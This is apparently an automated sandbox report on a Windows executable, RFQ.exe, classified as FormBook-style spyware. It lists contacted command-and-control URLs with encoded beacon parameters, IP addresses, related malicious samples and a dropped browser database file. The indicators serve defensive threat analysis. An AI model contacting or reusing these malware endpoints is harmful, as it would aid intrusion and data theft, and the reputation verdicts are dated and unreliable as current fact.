INFOMANIAK-ASCH Switzerland 22->36 38 6 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.bio-thymus.com/ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gx0%Avira URL Cloudsafe
                http://www.astorg-group.info/vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gx0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gx100%Avira URL Cloudmalware
                http://www.fiqsth.vip/0m8a/0%Avira URL Cloudsafe
                http://www.evoo.website/293d/0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=4nk.education0%Avira URL Cloudsafe
                http://www.wukong.college/9ezc/0%Avira URL Cloudsafe
                http://www.4nk.education/gnvu/100%Avira URL Cloudmalware
                http://www.kdtzhb.top/1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gx0%Avira URL Cloudsafe
                http://www.wukong.college0%Avira URL Cloudsafe
                http://www.kdtzhb.top/1iqa/0%Avira URL Cloudsafe
                http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gx100%Avira URL Cloudmalware
                http://www.migraine-massages.pro/ym43/0%Avira URL Cloudsafe
                http://www.vnxoso88.art/d26j/0%Avira URL Cloudsafe
                https://whois.gandi.net/en/results?search=astorg-group.info0%Avira URL Cloudsafe
                http://www.fiqsth.vip/0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsUR0%Avira URL Cloudsafe
                http://www.evoo.website/293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gx0%Avira URL Cloudsafe
                http://www.astorg-group.info/vdvc/0%Avira URL Cloudsafe
                http://www.vnxoso88.art/d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gx0%Avira URL Cloudsafe
                http://www.pluribiz.life/afcr/0%Avira URL Cloudsafe
                http://www.bio-thymus.com/ezyn/0%Avira URL Cloudsafe
                http://www.migraine-massages.pro/ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re50%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  www.evoo.website
                  		128.65.195.180
                  		truefalse
                    		unknown
                    fiqsth.vip
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.wukong.college
                      		47.52.221.8
                      		truefalse
                        		unknown
                        bio-thymus.com
                        		3.33.130.190
                        		truefalse
                          		unknown
                          vnxoso88.art
                          		66.29.146.14
                          		truefalse
                            		unknown
                            www.pluribiz.life
                            		209.74.64.58
                            		truefalse
                              		unknown
                              www.kdtzhb.top
                              		47.242.89.146
                              		truefalse
                                		unknown
                                corpseflowerwatch.org
                                		3.33.130.190
                                		truefalse
                                  		unknown
                                  www.migraine-massages.pro
                                  		199.59.243.227
                                  		truefalse
                                    		unknown
                                    www.corpseflowerwatch.org
                                    		unknown
                                    		unknownfalse
                                      		unknown
                                      www.vnxoso88.art
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.4nk.education
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.astorg-group.info
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.bio-thymus.com
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.fiqsth.vip
                                              		unknown
                                              		unknownfalse
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.4nk.education/gnvu/false
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.evoo.website/293d/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.astorg-group.info/vdvc/?7j=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfNZBZZEaN8IgdCZSECanEbYOAZ+JnzF5T5/sjPpe9MQhZicEiQ4HPQfz&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fiqsth.vip/0m8a/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bio-thymus.com/ezyn/?7j=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKN8+Alsd/uAlfqbny7J4c2YDLjDocbldGRQwWRw5cBSMls9XvUBQui7N&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.4nk.education/gnvu/?7j=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FgkX779Cut1JrjhVNutQKYieetaE9VDmnk+XmhNaaOMMHcA19omccG+Ez&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.kdtzhb.top/1iqa/?7j=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgVC25Yrin2Sqkv5Fwdk+dvafD+ucZYRStKeuK1fTd52HaDhfGqTyDFD4&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.wukong.college/9ezc/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.kdtzhb.top/1iqa/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.corpseflowerwatch.org/yjfe/?7j=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZq285UIefAyWvRUTG1EMSSL8yxTXDHgut2ZldiYl/24i9u+qUtajOfEi&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: malware
                                                		unknown
                                                http://www.migraine-massages.pro/ym43/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.vnxoso88.art/d26j/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.evoo.website/293d/?7j=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQY4I1bDlFW6+Qsk+eyldD4LupDRErgy15HSDrpN9gAoL/hEh+9gUTgMo&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fiqsth.vip/0m8a/?UvgPX=o0HdzhbpI6gx&7j=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo4fbiPNZTItUz1VN35oCbCkoE872J7CJYymsP5Px3u6hB+1hbmngRsURfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.astorg-group.info/vdvc/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.vnxoso88.art/d26j/?7j=yTdTvK6nwd7fLzOfAFK44iBGWUg6tisBFi4nbiSuwNVJLrY4NtXgfJKYD2NhiKrdBAMHfcdZvgkmH1tO/OhN2l5ObUVyEmhL88sORBUDBhEqT85THbs6ZR8PHSXuaXUURr4h8daA5RZo&UvgPX=o0HdzhbpI6gxfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.pluribiz.life/afcr/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bio-thymus.com/ezyn/false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.migraine-massages.pro/ym43/?UvgPX=o0HdzhbpI6gx&7j=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQrtCTIFT6dG/tSbtJaoqKbhoy9A6auA9JhwvUMdjGZYE6oZ+fUFh6Re5false
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabnet.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://duckduckgo.com/ac/?q=net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.iconet.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://whois.gandi.net/en/results?search=4nk.educationnet.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.wukong.collegerNgGAKxrFRkFYx.exe, 0000000C.00000002.3131106553.0000000004C73000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.gandi.net/en/domainnet.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, net.exe, 0000000B.00000002.3130867153.0000000004456000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002D56000.00000004.00000001.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://www.ecosia.org/newtab/net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://whois.gandi.net/en/results?search=astorg-group.infonet.exe, 0000000B.00000002.3130867153.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.3132876926.0000000006660000.00000004.00000800.00020000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.00000000036C2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://ac.ecosia.org/autocomplete?q=net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.google.comnet.exe, 0000000B.00000002.3130867153.00000000045E8000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.0000000002EE8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refernet.exe, 0000000B.00000002.3130867153.000000000477A000.00000004.10000000.00040000.00000000.sdmp, rNgGAKxrFRkFYx.exe, 0000000C.00000002.3129106361.000000000307A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 0000000B.00000003.1694957428.000000000812D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high

                                                                        World Map of Contacted IPs

                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs

                                                                        Public IPs

                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                        47.52.221.8
                                                                        		www.wukong.collegeUnited States
                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                                                        128.65.195.180
                                                                        		www.evoo.websiteSwitzerland
                                                                        		29222INFOMANIAK-ASCHfalse
                                                                        199.59.243.227
                                                                        		www.migraine-massages.proUnited States
                                                                        		395082BODIS-NJUSfalse
                                                                        217.70.184.50
                                                                        		webredir.vip.gandi.netFrance
                                                                        		29169GANDI-ASDomainnameregistrar-httpwwwgandinetFRfalse
                                                                        209.74.64.58
                                                                        		www.pluribiz.lifeUnited States
                                                                        		31744MULTIBAND-NEWHOPEUSfalse
                                                                        66.29.146.14
                                                                        		vnxoso88.artUnited States
                                                                        		19538ADVANTAGECOMUSfalse
                                                                        3.33.130.190
                                                                        		fiqsth.vipUnited States
                                                                        		8987AMAZONEXPANSIONGBfalse
                                                                        47.242.89.146
                                                                        		www.kdtzhb.topUnited States
                                                                        		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                        General Information

                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                        Analysis ID:1551421
                                                                        Start date and time:2024-11-07 17:56:08 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 9m 16s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Run name:Run with higher sleep bypass
                                                                        Number of analysed new started processes analysed:17
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:2
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:RFQ.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@7/2@11/8
                                                                        EGA Information:
                                                                        • Successful, ratio: 75%
                                                                        HCA Information:
                                                                        • Successful, ratio: 91%
                                                                        • Number of executed functions: 47
                                                                        • Number of non-executed functions: 306
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                        Warnings

                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                        • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                        • VT rate limit hit for: RFQ.exe

                                                                        Simulations

                                                                        Behavior and APIs

                                                                        TimeTypeDescription
                                                                        13:55:43API Interceptor6021309x Sleep call for process: net.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        47.52.221.8XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • www.wukong.college/9ezc/
                                                                        128.65.195.180XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • www.evoo.website/293d/
                                                                        TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                        • www.airbnbneuchatel.com/0zfk/
                                                                        Inquiry Second Reminder.exeGet hashmaliciousFormBookBrowse
                                                                        • www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
                                                                        LPOH2401-3172(Mr.Kem Sophea)-pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
                                                                        PGiUp8uqGt.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
                                                                        LGSTXJeTc4.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
                                                                        MVEjijPB3m.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
                                                                        luK5jtgopg.exeGet hashmaliciousFormBookBrowse
                                                                        • www.zimmerli.online/btrd/?_vgLOdj=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&W0Ddg8=u2Jd-dT8bPB0k
                                                                        iKF9HO6p8LJfhir.exeGet hashmaliciousFormBook, PlayBrowse
                                                                        • www.derbychess.com/qfhc/?cNu_sBI=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkVKyniTIgT66iQ==&mg3Oy_=oFKCX
                                                                        IN0982746R789.exeGet hashmaliciousFormBook, PlayBrowse
                                                                        • www.derbychess.com/qfhc/?JmZH=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkX7o5TTIhSCIiQ==&e_6PiF=8ZYjPlE
                                                                        199.59.243.227Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • glassbright.net/index.php
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • glassbright.net/index.php
                                                                        Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • variousstream.net/index.php
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • glassbright.net/index.php
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • variousstream.net/index.php
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • glassbright.net/index.php
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • variousstream.net/index.php
                                                                        nnzZhhVIqM.exeGet hashmaliciousUnknownBrowse
                                                                        • variousstream.net/index.php
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • variousstream.net/index.php
                                                                        PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                        • glassbright.net/index.php

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        www.pluribiz.lifeXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 209.74.64.58
                                                                        MV Sunshine.exeGet hashmaliciousFormBookBrowse
                                                                        • 209.74.64.58
                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                        • 209.74.64.58
                                                                        webredir.vip.gandi.netXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        CENA.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        www.evoo.websiteXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 128.65.195.180
                                                                        www.wukong.collegeXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.52.221.8
                                                                        www.kdtzhb.topXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.242.89.146

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        INFOMANIAK-ASCHXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 128.65.195.180
                                                                        https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                        • 128.65.195.91
                                                                        https://www.google.com/url?q=https://www.google.la/amp/s/mail.ccuk.edu.ng/home/&ust=1729769376151000&usg=AOvVaw1rOQXXFFFEiE_w3hFls1yLGet hashmaliciousRattyBrowse
                                                                        • 128.65.195.91
                                                                        z95ordemdecomprapdfx4672xx.exeGet hashmaliciousFormBookBrowse
                                                                        • 84.16.66.164
                                                                        Doc.exeGet hashmaliciousSliverBrowse
                                                                        • 128.65.199.135
                                                                        Nowe zam#U00f3wienie zakupu pdf.exeGet hashmaliciousFormBookBrowse
                                                                        • 84.16.66.164
                                                                        TT Application copy.exeGet hashmaliciousFormBookBrowse
                                                                        • 128.65.195.180
                                                                        eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                        • 84.16.66.164
                                                                        hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                                        • 84.16.66.164
                                                                        xP1455Elxv.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 185.176.232.182
                                                                        GANDI-ASDomainnameregistrar-httpwwwgandinetFRXhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        #10302024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO-000041522.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        Doc 784-01965670.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        BL.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        rDebitadvice22_10_2024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                        • 217.70.184.50
                                                                        BODIS-NJUSZ4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        Z4KBs1USsJ.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        YiqjcLlhew.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        8CO4P3HwDt.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        nnzZhhVIqM.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        66HKNPT1fl.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                        • 199.59.243.227
                                                                        CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCbyte.x86.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 8.214.203.151
                                                                        8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 47.244.127.62
                                                                        XhAQ0Rk63O.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.242.89.146
                                                                        https://media.nomadsport.net/Culture/SetCulture?culture=en&returnUrl=https://t.ly/qrCwtGet hashmaliciousUnknownBrowse
                                                                        • 47.253.61.56
                                                                        http://bankllist.usGet hashmaliciousUnknownBrowse
                                                                        • 47.253.61.56
                                                                        IbRV4I7MrS.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.210.3.99
                                                                        H1CYDJ8LQe.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.217.17.192
                                                                        En88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                        • 8.210.49.139
                                                                        mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                        • 47.242.252.174
                                                                        arm.elfGet hashmaliciousMirai, GafgytBrowse
                                                                        • 47.251.12.143

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\F14431U2a

                                                                        Download File
                                                                        Process:C:\Windows\SysWOW64\net.exe
                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                        Category:modified
                                                                        Size (bytes):196608
                                                                        Entropy (8bit):1.1215420383712111
                                                                        Encrypted:false
                                                                        SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                        MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                        SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                        SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                        SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

